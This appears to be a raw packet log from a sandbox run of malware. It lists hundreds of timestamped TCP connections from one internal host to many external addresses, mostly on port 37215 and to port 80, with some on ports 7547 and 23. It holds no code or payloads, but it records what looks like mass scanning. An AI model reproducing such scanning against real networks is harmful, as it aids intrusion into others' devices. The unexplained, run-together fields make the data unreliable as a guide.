                                          Nov 7, 2024 11:57:59.435507059 CET3070437215192.168.2.13156.162.46.22
                                          Nov 7, 2024 11:57:59.435512066 CET3721530704156.161.14.58192.168.2.13
                                          Nov 7, 2024 11:57:59.435522079 CET3721530704156.79.48.0192.168.2.13
                                          Nov 7, 2024 11:57:59.435528994 CET3070437215192.168.2.13156.225.145.98
                                          Nov 7, 2024 11:57:59.435528994 CET3070437215192.168.2.13156.227.229.251
                                          Nov 7, 2024 11:57:59.435530901 CET3721530704156.166.73.16192.168.2.13
                                          Nov 7, 2024 11:57:59.435542107 CET3721530704156.87.47.254192.168.2.13
                                          Nov 7, 2024 11:57:59.435547113 CET3070437215192.168.2.13156.161.14.58
                                          Nov 7, 2024 11:57:59.435554028 CET3721530704156.246.251.67192.168.2.13
                                          Nov 7, 2024 11:57:59.435555935 CET3070437215192.168.2.13156.79.48.0
                                          Nov 7, 2024 11:57:59.435564995 CET3721530704156.32.204.198192.168.2.13
                                          Nov 7, 2024 11:57:59.435575008 CET3721530704156.209.114.187192.168.2.13
                                          Nov 7, 2024 11:57:59.435578108 CET3070437215192.168.2.13156.166.73.16
                                          Nov 7, 2024 11:57:59.435584068 CET3070437215192.168.2.13156.87.47.254
                                          Nov 7, 2024 11:57:59.435585022 CET3070437215192.168.2.13156.246.251.67
                                          Nov 7, 2024 11:57:59.435594082 CET3721530704156.45.218.90192.168.2.13
                                          Nov 7, 2024 11:57:59.435601950 CET3070437215192.168.2.13156.32.204.198
                                          Nov 7, 2024 11:57:59.435604095 CET3721530704156.154.190.164192.168.2.13
                                          Nov 7, 2024 11:57:59.435615063 CET3721530704156.162.169.254192.168.2.13
                                          Nov 7, 2024 11:57:59.435616016 CET3070437215192.168.2.13156.209.114.187
                                          Nov 7, 2024 11:57:59.435626030 CET3721530704156.41.87.227192.168.2.13
                                          Nov 7, 2024 11:57:59.435633898 CET3070437215192.168.2.13156.45.218.90
                                          Nov 7, 2024 11:57:59.435635090 CET75475925045.38.44.1192.168.2.13
                                          Nov 7, 2024 11:57:59.435633898 CET3070437215192.168.2.13156.154.190.164
                                          Nov 7, 2024 11:57:59.435647011 CET3721530704156.177.68.75192.168.2.13
                                          Nov 7, 2024 11:57:59.435657024 CET3721530704156.140.91.7192.168.2.13
                                          Nov 7, 2024 11:57:59.435659885 CET3070437215192.168.2.13156.41.87.227
                                          Nov 7, 2024 11:57:59.435667992 CET592507547192.168.2.1345.38.44.1
                                          Nov 7, 2024 11:57:59.435668945 CET3721530704156.231.87.237192.168.2.13
                                          Nov 7, 2024 11:57:59.435669899 CET3070437215192.168.2.13156.162.169.254
                                          Nov 7, 2024 11:57:59.435678005 CET3721530704156.186.43.125192.168.2.13
                                          Nov 7, 2024 11:57:59.435681105 CET3070437215192.168.2.13156.177.68.75
                                          Nov 7, 2024 11:57:59.435697079 CET3070437215192.168.2.13156.140.91.7
                                          Nov 7, 2024 11:57:59.435702085 CET3070437215192.168.2.13156.231.87.237
                                          Nov 7, 2024 11:57:59.435714006 CET3070437215192.168.2.13156.186.43.125
                                          Nov 7, 2024 11:57:59.435745001 CET511867547192.168.2.1378.190.240.127
                                          Nov 7, 2024 11:57:59.435996056 CET3721530704156.176.112.56192.168.2.13
                                          Nov 7, 2024 11:57:59.436007977 CET3721530704156.39.241.158192.168.2.13
                                          Nov 7, 2024 11:57:59.436017036 CET3721530704156.82.155.135192.168.2.13
                                          Nov 7, 2024 11:57:59.436027050 CET3721530704156.148.250.119192.168.2.13
                                          Nov 7, 2024 11:57:59.436029911 CET3070437215192.168.2.13156.176.112.56
                                          Nov 7, 2024 11:57:59.436033964 CET3070437215192.168.2.13156.39.241.158
                                          Nov 7, 2024 11:57:59.436037064 CET3721530704156.254.164.117192.168.2.13
                                          Nov 7, 2024 11:57:59.436045885 CET3070437215192.168.2.13156.82.155.135
                                          Nov 7, 2024 11:57:59.436048031 CET3721530704156.33.68.27192.168.2.13
                                          Nov 7, 2024 11:57:59.436069012 CET3721530704156.235.148.190192.168.2.13
                                          Nov 7, 2024 11:57:59.436070919 CET3070437215192.168.2.13156.148.250.119
                                          Nov 7, 2024 11:57:59.436070919 CET3070437215192.168.2.13156.254.164.117
                                          Nov 7, 2024 11:57:59.436073065 CET3070437215192.168.2.13156.33.68.27
                                          Nov 7, 2024 11:57:59.436079979 CET3721530704156.220.72.84192.168.2.13
                                          Nov 7, 2024 11:57:59.436091900 CET3721530704156.160.98.232192.168.2.13
                                          Nov 7, 2024 11:57:59.436101913 CET3721530704156.241.144.223192.168.2.13
                                          Nov 7, 2024 11:57:59.436109066 CET3070437215192.168.2.13156.235.148.190
                                          Nov 7, 2024 11:57:59.436111927 CET3721530704156.195.112.200192.168.2.13
                                          Nov 7, 2024 11:57:59.436121941 CET3070437215192.168.2.13156.220.72.84
                                          Nov 7, 2024 11:57:59.436130047 CET3721530704156.20.132.190192.168.2.13
                                          Nov 7, 2024 11:57:59.436135054 CET3070437215192.168.2.13156.160.98.232
                                          Nov 7, 2024 11:57:59.436146021 CET3070437215192.168.2.13156.241.144.223
                                          Nov 7, 2024 11:57:59.436146021 CET3721530704156.165.67.94192.168.2.13
                                          Nov 7, 2024 11:57:59.436147928 CET3070437215192.168.2.13156.195.112.200
                                          Nov 7, 2024 11:57:59.436156988 CET3721530704156.64.146.222192.168.2.13
                                          Nov 7, 2024 11:57:59.436167955 CET3721530704156.233.225.149192.168.2.13
                                          Nov 7, 2024 11:57:59.436171055 CET3070437215192.168.2.13156.20.132.190
                                          Nov 7, 2024 11:57:59.436178923 CET3721530704156.150.26.198192.168.2.13
                                          Nov 7, 2024 11:57:59.436184883 CET3070437215192.168.2.13156.165.67.94
                                          Nov 7, 2024 11:57:59.436189890 CET3721530704156.90.164.167192.168.2.13
                                          Nov 7, 2024 11:57:59.436197996 CET3070437215192.168.2.13156.64.146.222
                                          Nov 7, 2024 11:57:59.436199903 CET3721530704156.182.135.75192.168.2.13
                                          Nov 7, 2024 11:57:59.436207056 CET3070437215192.168.2.13156.233.225.149
                                          Nov 7, 2024 11:57:59.436208963 CET3070437215192.168.2.13156.150.26.198
                                          Nov 7, 2024 11:57:59.436211109 CET3721530704156.43.174.78192.168.2.13
                                          Nov 7, 2024 11:57:59.436228991 CET3721530704156.253.228.175192.168.2.13
                                          Nov 7, 2024 11:57:59.436234951 CET3070437215192.168.2.13156.43.174.78
                                          Nov 7, 2024 11:57:59.436235905 CET3070437215192.168.2.13156.90.164.167
                                          Nov 7, 2024 11:57:59.436235905 CET3070437215192.168.2.13156.182.135.75
                                          Nov 7, 2024 11:57:59.436239004 CET3721530704156.205.175.113192.168.2.13
                                          Nov 7, 2024 11:57:59.436242104 CET5450423192.168.2.1340.117.107.0
                                          Nov 7, 2024 11:57:59.436249018 CET3721530704156.50.12.232192.168.2.13
                                          Nov 7, 2024 11:57:59.436259031 CET3721530704156.180.66.182192.168.2.13
                                          Nov 7, 2024 11:57:59.436266899 CET3070437215192.168.2.13156.253.228.175
                                          Nov 7, 2024 11:57:59.436268091 CET3721530704156.112.226.228192.168.2.13
                                          Nov 7, 2024 11:57:59.436279058 CET3721530704156.13.158.111192.168.2.13
                                          Nov 7, 2024 11:57:59.436281919 CET3070437215192.168.2.13156.50.12.232
                                          Nov 7, 2024 11:57:59.436283112 CET3070437215192.168.2.13156.180.66.182
                                          Nov 7, 2024 11:57:59.436288118 CET3721530704156.243.115.101192.168.2.13
                                          Nov 7, 2024 11:57:59.436290979 CET3070437215192.168.2.13156.205.175.113
                                          Nov 7, 2024 11:57:59.436299086 CET3721530704156.50.215.231192.168.2.13
                                          Nov 7, 2024 11:57:59.436309099 CET3721530704156.38.214.163192.168.2.13
                                          Nov 7, 2024 11:57:59.436316013 CET3070437215192.168.2.13156.112.226.228
                                          Nov 7, 2024 11:57:59.436323881 CET3070437215192.168.2.13156.243.115.101
                                          Nov 7, 2024 11:57:59.436326027 CET3070437215192.168.2.13156.13.158.111
                                          Nov 7, 2024 11:57:59.436332941 CET3070437215192.168.2.13156.50.215.231
                                          Nov 7, 2024 11:57:59.436336994 CET3070437215192.168.2.13156.38.214.163
                                          Nov 7, 2024 11:57:59.436778069 CET3721530704156.186.111.192192.168.2.13
                                          Nov 7, 2024 11:57:59.436789989 CET3721530704156.3.178.16192.168.2.13
                                          Nov 7, 2024 11:57:59.436800957 CET3721530704156.143.137.164192.168.2.13
                                          Nov 7, 2024 11:57:59.436819077 CET3721530704156.255.10.33192.168.2.13
                                          Nov 7, 2024 11:57:59.436831951 CET3721530704156.152.209.139192.168.2.13
                                          Nov 7, 2024 11:57:59.436841965 CET3721530704156.213.199.65192.168.2.13
                                          Nov 7, 2024 11:57:59.436851978 CET3721530704156.245.75.66192.168.2.13
                                          Nov 7, 2024 11:57:59.436857939 CET3070437215192.168.2.13156.255.10.33
                                          Nov 7, 2024 11:57:59.436861038 CET3721530704156.153.170.102192.168.2.13
                                          Nov 7, 2024 11:57:59.436862946 CET3070437215192.168.2.13156.152.209.139
                                          Nov 7, 2024 11:57:59.436866999 CET3070437215192.168.2.13156.186.111.192
                                          Nov 7, 2024 11:57:59.436866999 CET3070437215192.168.2.13156.3.178.16
                                          Nov 7, 2024 11:57:59.436870098 CET3070437215192.168.2.13156.143.137.164
                                          Nov 7, 2024 11:57:59.436871052 CET3721530704156.227.96.32192.168.2.13
                                          Nov 7, 2024 11:57:59.436877012 CET3070437215192.168.2.13156.213.199.65
                                          Nov 7, 2024 11:57:59.436882973 CET3721530704156.43.168.141192.168.2.13
                                          Nov 7, 2024 11:57:59.436882973 CET3070437215192.168.2.13156.245.75.66
                                          Nov 7, 2024 11:57:59.436894894 CET3721530704156.82.243.9192.168.2.13
                                          Nov 7, 2024 11:57:59.436898947 CET3070437215192.168.2.13156.227.96.32
                                          Nov 7, 2024 11:57:59.436899900 CET3070437215192.168.2.13156.153.170.102
                                          Nov 7, 2024 11:57:59.436913967 CET3721530704156.60.77.222192.168.2.13
                                          Nov 7, 2024 11:57:59.436916113 CET3070437215192.168.2.13156.43.168.141
                                          Nov 7, 2024 11:57:59.436923981 CET3721530704156.95.110.59192.168.2.13
                                          Nov 7, 2024 11:57:59.436923981 CET3070437215192.168.2.13156.82.243.9
                                          Nov 7, 2024 11:57:59.436934948 CET3721530704156.136.222.231192.168.2.13
                                          Nov 7, 2024 11:57:59.436944962 CET3721530704156.152.34.158192.168.2.13
                                          Nov 7, 2024 11:57:59.436954021 CET3070437215192.168.2.13156.60.77.222
                                          Nov 7, 2024 11:57:59.436954975 CET3721530704156.38.254.187192.168.2.13
                                          Nov 7, 2024 11:57:59.436954975 CET3070437215192.168.2.13156.95.110.59
                                          Nov 7, 2024 11:57:59.436966896 CET3721530704156.38.97.69192.168.2.13
                                          Nov 7, 2024 11:57:59.436976910 CET3721530704156.88.193.255192.168.2.13
                                          Nov 7, 2024 11:57:59.436978102 CET3070437215192.168.2.13156.152.34.158
                                          Nov 7, 2024 11:57:59.436980009 CET3070437215192.168.2.13156.136.222.231
                                          Nov 7, 2024 11:57:59.436985970 CET3070437215192.168.2.13156.38.254.187
                                          Nov 7, 2024 11:57:59.436986923 CET3721530704156.40.48.83192.168.2.13
                                          Nov 7, 2024 11:57:59.436992884 CET3070437215192.168.2.13156.38.97.69
                                          Nov 7, 2024 11:57:59.436999083 CET3721530704156.166.64.238192.168.2.13
                                          Nov 7, 2024 11:57:59.437012911 CET228880192.168.2.1382.229.50.24
                                          Nov 7, 2024 11:57:59.437014103 CET228880192.168.2.1382.229.90.98
                                          Nov 7, 2024 11:57:59.437014103 CET3070437215192.168.2.13156.88.193.255
                                          Nov 7, 2024 11:57:59.437016010 CET3070437215192.168.2.13156.40.48.83
                                          Nov 7, 2024 11:57:59.437019110 CET3721530704156.164.129.62192.168.2.13
                                          Nov 7, 2024 11:57:59.437030077 CET3721530704156.132.75.56192.168.2.13
                                          Nov 7, 2024 11:57:59.437036991 CET228880192.168.2.1382.181.99.113
                                          Nov 7, 2024 11:57:59.437036991 CET228880192.168.2.1382.198.173.36
                                          Nov 7, 2024 11:57:59.437038898 CET3721530704156.90.206.82192.168.2.13
                                          Nov 7, 2024 11:57:59.437051058 CET3721530704156.94.192.124192.168.2.13
                                          Nov 7, 2024 11:57:59.437057018 CET228880192.168.2.1382.81.152.157
                                          Nov 7, 2024 11:57:59.437057972 CET228880192.168.2.1382.108.185.182
                                          Nov 7, 2024 11:57:59.437057972 CET3070437215192.168.2.13156.132.75.56
                                          Nov 7, 2024 11:57:59.437058926 CET3070437215192.168.2.13156.166.64.238
                                          Nov 7, 2024 11:57:59.437058926 CET3070437215192.168.2.13156.164.129.62
                                          Nov 7, 2024 11:57:59.437061071 CET3721530704156.176.166.141192.168.2.13
                                          Nov 7, 2024 11:57:59.437072039 CET3721530704156.215.35.170192.168.2.13
                                          Nov 7, 2024 11:57:59.437073946 CET3070437215192.168.2.13156.90.206.82
                                          Nov 7, 2024 11:57:59.437082052 CET3721530704156.64.176.9192.168.2.13
                                          Nov 7, 2024 11:57:59.437088966 CET3070437215192.168.2.13156.94.192.124
                                          Nov 7, 2024 11:57:59.437092066 CET228880192.168.2.1382.25.77.198
                                          Nov 7, 2024 11:57:59.437092066 CET3721530704156.85.50.247192.168.2.13
                                          Nov 7, 2024 11:57:59.437093973 CET3070437215192.168.2.13156.176.166.141
                                          Nov 7, 2024 11:57:59.437108040 CET3070437215192.168.2.13156.215.35.170
                                          Nov 7, 2024 11:57:59.437119961 CET3070437215192.168.2.13156.64.176.9
                                          Nov 7, 2024 11:57:59.437119961 CET228880192.168.2.1382.183.161.115
                                          Nov 7, 2024 11:57:59.437124014 CET228880192.168.2.1382.148.229.130
                                          Nov 7, 2024 11:57:59.437128067 CET228880192.168.2.1382.222.10.38
                                          Nov 7, 2024 11:57:59.437129021 CET228880192.168.2.1382.246.49.19
                                          Nov 7, 2024 11:57:59.437128067 CET3070437215192.168.2.13156.85.50.247
                                          Nov 7, 2024 11:57:59.437134027 CET228880192.168.2.1382.237.72.58
                                          Nov 7, 2024 11:57:59.437158108 CET228880192.168.2.1382.106.1.126
                                          Nov 7, 2024 11:57:59.437160969 CET228880192.168.2.1382.19.122.202
                                          Nov 7, 2024 11:57:59.437164068 CET228880192.168.2.1382.102.200.8
                                          Nov 7, 2024 11:57:59.437164068 CET228880192.168.2.1382.40.22.149
                                          Nov 7, 2024 11:57:59.437171936 CET228880192.168.2.1382.227.16.241
                                          Nov 7, 2024 11:57:59.437174082 CET228880192.168.2.1382.72.15.242
                                          Nov 7, 2024 11:57:59.437179089 CET228880192.168.2.1382.166.192.98
                                          Nov 7, 2024 11:57:59.437184095 CET228880192.168.2.1382.185.69.55
                                          Nov 7, 2024 11:57:59.437197924 CET228880192.168.2.1382.81.203.105
                                          Nov 7, 2024 11:57:59.437200069 CET228880192.168.2.1382.163.100.144
                                          Nov 7, 2024 11:57:59.437213898 CET228880192.168.2.1382.121.141.246
                                          Nov 7, 2024 11:57:59.437235117 CET228880192.168.2.1382.165.175.112
                                          Nov 7, 2024 11:57:59.437235117 CET228880192.168.2.1382.35.19.42
                                          Nov 7, 2024 11:57:59.437241077 CET228880192.168.2.1382.206.66.254
                                          Nov 7, 2024 11:57:59.437243938 CET228880192.168.2.1382.216.121.82
                                          Nov 7, 2024 11:57:59.437243938 CET228880192.168.2.1382.104.99.178
                                          Nov 7, 2024 11:57:59.437243938 CET228880192.168.2.1382.177.241.36
                                          Nov 7, 2024 11:57:59.437243938 CET228880192.168.2.1382.92.187.214
                                          Nov 7, 2024 11:57:59.437247038 CET228880192.168.2.1382.208.197.98
                                          Nov 7, 2024 11:57:59.437267065 CET228880192.168.2.1382.79.98.34
                                          Nov 7, 2024 11:57:59.437268972 CET228880192.168.2.1382.111.171.0
                                          Nov 7, 2024 11:57:59.437269926 CET228880192.168.2.1382.53.119.142
                                          Nov 7, 2024 11:57:59.437278032 CET228880192.168.2.1382.158.190.154
                                          Nov 7, 2024 11:57:59.437288046 CET228880192.168.2.1382.61.30.186
                                          Nov 7, 2024 11:57:59.437294006 CET228880192.168.2.1382.147.214.245
                                          Nov 7, 2024 11:57:59.437304974 CET228880192.168.2.1382.11.146.141
                                          Nov 7, 2024 11:57:59.437304974 CET228880192.168.2.1382.220.66.72
                                          Nov 7, 2024 11:57:59.437304974 CET228880192.168.2.1382.214.58.125
                                          Nov 7, 2024 11:57:59.437321901 CET228880192.168.2.1382.242.5.229
                                          Nov 7, 2024 11:57:59.437351942 CET228880192.168.2.1382.55.53.221
                                          Nov 7, 2024 11:57:59.437351942 CET228880192.168.2.1382.87.147.201
                                          Nov 7, 2024 11:57:59.437376022 CET228880192.168.2.1382.89.12.220
                                          Nov 7, 2024 11:57:59.437376022 CET228880192.168.2.1382.32.197.77
                                          Nov 7, 2024 11:57:59.437376022 CET228880192.168.2.1382.118.149.69
                                          Nov 7, 2024 11:57:59.437380075 CET228880192.168.2.1382.181.153.67
                                          Nov 7, 2024 11:57:59.437376022 CET228880192.168.2.1382.59.133.240
                                          Nov 7, 2024 11:57:59.437393904 CET228880192.168.2.1382.103.48.191
                                          Nov 7, 2024 11:57:59.437393904 CET228880192.168.2.1382.132.36.248
                                          Nov 7, 2024 11:57:59.437396049 CET228880192.168.2.1382.137.79.144
                                          Nov 7, 2024 11:57:59.437402964 CET228880192.168.2.1382.51.15.244
                                          Nov 7, 2024 11:57:59.437407970 CET228880192.168.2.1382.194.115.124
                                          Nov 7, 2024 11:57:59.437416077 CET228880192.168.2.1382.114.223.71
                                          Nov 7, 2024 11:57:59.437421083 CET228880192.168.2.1382.92.143.233
                                          Nov 7, 2024 11:57:59.437426090 CET228880192.168.2.1382.88.38.189
                                          Nov 7, 2024 11:57:59.437433958 CET228880192.168.2.1382.69.77.124
                                          Nov 7, 2024 11:57:59.437433958 CET228880192.168.2.1382.61.113.80
                                          Nov 7, 2024 11:57:59.437447071 CET228880192.168.2.1382.241.12.237
                                          Nov 7, 2024 11:57:59.437446117 CET228880192.168.2.1382.251.74.31
                                          Nov 7, 2024 11:57:59.437446117 CET228880192.168.2.1382.157.59.95
                                          Nov 7, 2024 11:57:59.437455893 CET228880192.168.2.1382.235.242.168
                                          Nov 7, 2024 11:57:59.437462091 CET228880192.168.2.1382.141.81.228
                                          Nov 7, 2024 11:57:59.437463999 CET228880192.168.2.1382.15.235.5
                                          Nov 7, 2024 11:57:59.437467098 CET228880192.168.2.1382.19.178.220
                                          Nov 7, 2024 11:57:59.437493086 CET228880192.168.2.1382.149.166.83
                                          Nov 7, 2024 11:57:59.437499046 CET228880192.168.2.1382.128.32.64
                                          Nov 7, 2024 11:57:59.437501907 CET228880192.168.2.1382.123.139.171
                                          Nov 7, 2024 11:57:59.437517881 CET382627547192.168.2.1320.208.34.62
                                          Nov 7, 2024 11:57:59.437519073 CET228880192.168.2.1382.132.70.239
                                          Nov 7, 2024 11:57:59.437520981 CET228880192.168.2.1382.42.20.194
                                          Nov 7, 2024 11:57:59.437529087 CET228880192.168.2.1382.155.1.183
                                          Nov 7, 2024 11:57:59.437529087 CET228880192.168.2.1382.252.13.17
                                          Nov 7, 2024 11:57:59.437529087 CET228880192.168.2.1382.66.23.109
                                          Nov 7, 2024 11:57:59.437539101 CET228880192.168.2.1382.142.166.40
                                          Nov 7, 2024 11:57:59.437541962 CET228880192.168.2.1382.156.211.178
                                          Nov 7, 2024 11:57:59.437550068 CET228880192.168.2.1382.233.53.35
                                          Nov 7, 2024 11:57:59.437551022 CET228880192.168.2.1382.155.67.214
                                          Nov 7, 2024 11:57:59.437556982 CET228880192.168.2.1382.174.191.71
                                          Nov 7, 2024 11:57:59.437565088 CET228880192.168.2.1382.134.208.175
                                          Nov 7, 2024 11:57:59.437570095 CET228880192.168.2.1382.98.138.239
                                          Nov 7, 2024 11:57:59.437571049 CET228880192.168.2.1382.221.191.216
                                          Nov 7, 2024 11:57:59.437585115 CET228880192.168.2.1382.37.195.234
                                          Nov 7, 2024 11:57:59.437585115 CET228880192.168.2.1382.15.127.142
                                          Nov 7, 2024 11:57:59.437589884 CET228880192.168.2.1382.145.199.37
                                          Nov 7, 2024 11:57:59.437623978 CET228880192.168.2.1382.124.34.137
                                          Nov 7, 2024 11:57:59.437624931 CET228880192.168.2.1382.194.104.156
                                          Nov 7, 2024 11:57:59.437623978 CET228880192.168.2.1382.63.152.98
                                          Nov 7, 2024 11:57:59.437635899 CET228880192.168.2.1382.143.95.115
                                          Nov 7, 2024 11:57:59.437638044 CET228880192.168.2.1382.71.80.226
                                          Nov 7, 2024 11:57:59.437638998 CET228880192.168.2.1382.111.145.253
                                          Nov 7, 2024 11:57:59.437639952 CET228880192.168.2.1382.153.156.174
                                          Nov 7, 2024 11:57:59.437649012 CET228880192.168.2.1382.108.209.238
                                          Nov 7, 2024 11:57:59.437657118 CET228880192.168.2.1382.37.232.92
                                          Nov 7, 2024 11:57:59.437664986 CET228880192.168.2.1382.38.99.60
                                          Nov 7, 2024 11:57:59.437665939 CET228880192.168.2.1382.9.47.134
                                          Nov 7, 2024 11:57:59.437675953 CET228880192.168.2.1382.138.252.209
                                          Nov 7, 2024 11:57:59.437675953 CET228880192.168.2.1382.47.155.56
                                          Nov 7, 2024 11:57:59.437700033 CET228880192.168.2.1382.253.252.174
                                          Nov 7, 2024 11:57:59.437704086 CET228880192.168.2.1382.59.195.64
                                          Nov 7, 2024 11:57:59.437709093 CET228880192.168.2.1382.188.168.27
                                          Nov 7, 2024 11:57:59.437712908 CET228880192.168.2.1382.126.152.140
                                          Nov 7, 2024 11:57:59.437724113 CET228880192.168.2.1382.53.220.82
                                          Nov 7, 2024 11:57:59.437726974 CET228880192.168.2.1382.4.109.214
                                          Nov 7, 2024 11:57:59.437730074 CET228880192.168.2.1382.2.237.174
                                          Nov 7, 2024 11:57:59.437736988 CET228880192.168.2.1382.173.13.78
                                          Nov 7, 2024 11:57:59.437755108 CET228880192.168.2.1382.144.23.226
                                          Nov 7, 2024 11:57:59.437756062 CET228880192.168.2.1382.220.206.113
                                          Nov 7, 2024 11:57:59.437758923 CET228880192.168.2.1382.64.220.118
                                          Nov 7, 2024 11:57:59.437763929 CET228880192.168.2.1382.40.208.82
                                          Nov 7, 2024 11:57:59.437763929 CET228880192.168.2.1382.117.147.110
                                          Nov 7, 2024 11:57:59.437771082 CET228880192.168.2.1382.72.49.2
                                          Nov 7, 2024 11:57:59.437797070 CET228880192.168.2.1382.62.185.184
                                          Nov 7, 2024 11:57:59.437812090 CET228880192.168.2.1382.218.180.115
                                          Nov 7, 2024 11:57:59.437822104 CET228880192.168.2.1382.247.41.179
                                          Nov 7, 2024 11:57:59.437823057 CET228880192.168.2.1382.79.49.218
                                          Nov 7, 2024 11:57:59.437824011 CET228880192.168.2.1382.190.236.44
                                          Nov 7, 2024 11:57:59.437824011 CET228880192.168.2.1382.220.239.240
                                          Nov 7, 2024 11:57:59.437824011 CET228880192.168.2.1382.198.186.129
                                          Nov 7, 2024 11:57:59.437829018 CET228880192.168.2.1382.76.88.58
                                          Nov 7, 2024 11:57:59.437836885 CET228880192.168.2.1382.236.202.212
                                          Nov 7, 2024 11:57:59.437853098 CET228880192.168.2.1382.211.186.66
                                          Nov 7, 2024 11:57:59.437854052 CET228880192.168.2.1382.132.79.182
                                          Nov 7, 2024 11:57:59.437858105 CET228880192.168.2.1382.15.156.53
                                          Nov 7, 2024 11:57:59.437874079 CET228880192.168.2.1382.151.68.254
                                          Nov 7, 2024 11:57:59.437874079 CET228880192.168.2.1382.70.75.94
                                          Nov 7, 2024 11:57:59.437875032 CET228880192.168.2.1382.89.254.193
                                          Nov 7, 2024 11:57:59.437877893 CET228880192.168.2.1382.223.147.41
                                          Nov 7, 2024 11:57:59.437886953 CET228880192.168.2.1382.41.182.109
                                          Nov 7, 2024 11:57:59.437908888 CET228880192.168.2.1382.74.97.175
                                          Nov 7, 2024 11:57:59.437925100 CET228880192.168.2.1382.13.103.245
                                          Nov 7, 2024 11:57:59.437926054 CET228880192.168.2.1382.205.208.60
                                          Nov 7, 2024 11:57:59.437932014 CET228880192.168.2.1382.171.246.237
                                          Nov 7, 2024 11:57:59.437932014 CET228880192.168.2.1382.0.0.89
                                          Nov 7, 2024 11:57:59.437932968 CET228880192.168.2.1382.39.39.179
                                          Nov 7, 2024 11:57:59.437936068 CET228880192.168.2.1382.23.82.229
                                          Nov 7, 2024 11:57:59.437936068 CET228880192.168.2.1382.95.149.66
                                          Nov 7, 2024 11:57:59.437944889 CET228880192.168.2.1382.195.211.250
                                          Nov 7, 2024 11:57:59.437953949 CET228880192.168.2.1382.160.253.116
                                          Nov 7, 2024 11:57:59.437968016 CET228880192.168.2.1382.55.110.244
                                          Nov 7, 2024 11:57:59.437968016 CET228880192.168.2.1382.116.190.170
                                          Nov 7, 2024 11:57:59.437972069 CET228880192.168.2.1382.115.244.77
                                          Nov 7, 2024 11:57:59.437968969 CET228880192.168.2.1382.26.247.44
                                          Nov 7, 2024 11:57:59.437973976 CET228880192.168.2.1382.63.54.151
                                          Nov 7, 2024 11:57:59.437982082 CET228880192.168.2.1382.18.9.249
                                          Nov 7, 2024 11:57:59.437983036 CET228880192.168.2.1382.8.10.138
                                          Nov 7, 2024 11:57:59.437990904 CET228880192.168.2.1382.121.85.204
                                          Nov 7, 2024 11:57:59.438004017 CET228880192.168.2.1382.54.101.1
                                          Nov 7, 2024 11:57:59.438004971 CET228880192.168.2.1382.99.93.210
                                          Nov 7, 2024 11:57:59.438014984 CET228880192.168.2.1382.86.245.118
                                          Nov 7, 2024 11:57:59.438021898 CET3721530704156.69.116.217192.168.2.13
                                          Nov 7, 2024 11:57:59.438033104 CET228880192.168.2.1382.96.250.228
                                          Nov 7, 2024 11:57:59.438035965 CET228880192.168.2.1382.230.226.5
                                          Nov 7, 2024 11:57:59.438035965 CET228880192.168.2.1382.144.77.200
                                          Nov 7, 2024 11:57:59.438043118 CET3721530704156.210.24.45192.168.2.13
                                          Nov 7, 2024 11:57:59.438054085 CET228880192.168.2.1382.81.57.167
                                          Nov 7, 2024 11:57:59.438060045 CET228880192.168.2.1382.133.3.211
                                          Nov 7, 2024 11:57:59.438066006 CET3070437215192.168.2.13156.69.116.217
                                          Nov 7, 2024 11:57:59.438066006 CET228880192.168.2.1382.62.76.186
                                          Nov 7, 2024 11:57:59.438066006 CET228880192.168.2.1382.215.235.143
                                          Nov 7, 2024 11:57:59.438075066 CET228880192.168.2.1382.92.172.11
                                          Nov 7, 2024 11:57:59.438079119 CET228880192.168.2.1382.15.228.126
                                          Nov 7, 2024 11:57:59.438079119 CET228880192.168.2.1382.154.233.254
                                          Nov 7, 2024 11:57:59.438081026 CET3070437215192.168.2.13156.210.24.45
                                          Nov 7, 2024 11:57:59.438086033 CET228880192.168.2.1382.17.236.189
                                          Nov 7, 2024 11:57:59.438086033 CET228880192.168.2.1382.216.98.101
                                          Nov 7, 2024 11:57:59.438105106 CET228880192.168.2.1382.95.63.220
                                          Nov 7, 2024 11:57:59.438105106 CET228880192.168.2.1382.180.208.10
                                          Nov 7, 2024 11:57:59.438107967 CET228880192.168.2.1382.52.111.251
                                          Nov 7, 2024 11:57:59.438112974 CET228880192.168.2.1382.248.127.59
                                          Nov 7, 2024 11:57:59.438112974 CET228880192.168.2.1382.152.160.96
                                          Nov 7, 2024 11:57:59.438142061 CET228880192.168.2.1382.198.163.165
                                          Nov 7, 2024 11:57:59.438146114 CET228880192.168.2.1382.66.230.255
                                          Nov 7, 2024 11:57:59.438148022 CET228880192.168.2.1382.253.194.47
                                          Nov 7, 2024 11:57:59.438164949 CET228880192.168.2.1382.141.175.162
                                          Nov 7, 2024 11:57:59.438164949 CET228880192.168.2.1382.99.250.12
                                          Nov 7, 2024 11:57:59.438167095 CET3721530704156.230.201.121192.168.2.13
                                          Nov 7, 2024 11:57:59.438169956 CET228880192.168.2.1382.245.17.246
                                          Nov 7, 2024 11:57:59.438169956 CET228880192.168.2.1382.201.25.231
                                          Nov 7, 2024 11:57:59.438178062 CET3721530704156.194.86.93192.168.2.13
                                          Nov 7, 2024 11:57:59.438188076 CET3721530704156.53.92.43192.168.2.13
                                          Nov 7, 2024 11:57:59.438190937 CET228880192.168.2.1382.18.41.77
                                          Nov 7, 2024 11:57:59.438190937 CET228880192.168.2.1382.156.212.67
                                          Nov 7, 2024 11:57:59.438190937 CET228880192.168.2.1382.111.207.54
                                          Nov 7, 2024 11:57:59.438191891 CET3070437215192.168.2.13156.230.201.121
                                          Nov 7, 2024 11:57:59.438194036 CET228880192.168.2.1382.88.116.82
                                          Nov 7, 2024 11:57:59.438196898 CET3721530704156.39.8.58192.168.2.13
                                          Nov 7, 2024 11:57:59.438208103 CET3721530704156.123.177.10192.168.2.13
                                          Nov 7, 2024 11:57:59.438209057 CET3070437215192.168.2.13156.194.86.93
                                          Nov 7, 2024 11:57:59.438215017 CET228880192.168.2.1382.15.184.240
                                          Nov 7, 2024 11:57:59.438215017 CET228880192.168.2.1382.26.4.149
                                          Nov 7, 2024 11:57:59.438221931 CET3070437215192.168.2.13156.53.92.43
                                          Nov 7, 2024 11:57:59.438225985 CET3721530704156.71.196.29192.168.2.13
                                          Nov 7, 2024 11:57:59.438235044 CET3070437215192.168.2.13156.39.8.58
                                          Nov 7, 2024 11:57:59.438239098 CET3721530704156.158.68.69192.168.2.13
                                          Nov 7, 2024 11:57:59.438246965 CET228880192.168.2.1382.163.15.222
                                          Nov 7, 2024 11:57:59.438247919 CET228880192.168.2.1382.33.131.98
                                          Nov 7, 2024 11:57:59.438247919 CET3721530704156.233.88.171192.168.2.13
                                          Nov 7, 2024 11:57:59.438256979 CET228880192.168.2.1382.3.53.66
                                          Nov 7, 2024 11:57:59.438256979 CET3070437215192.168.2.13156.123.177.10
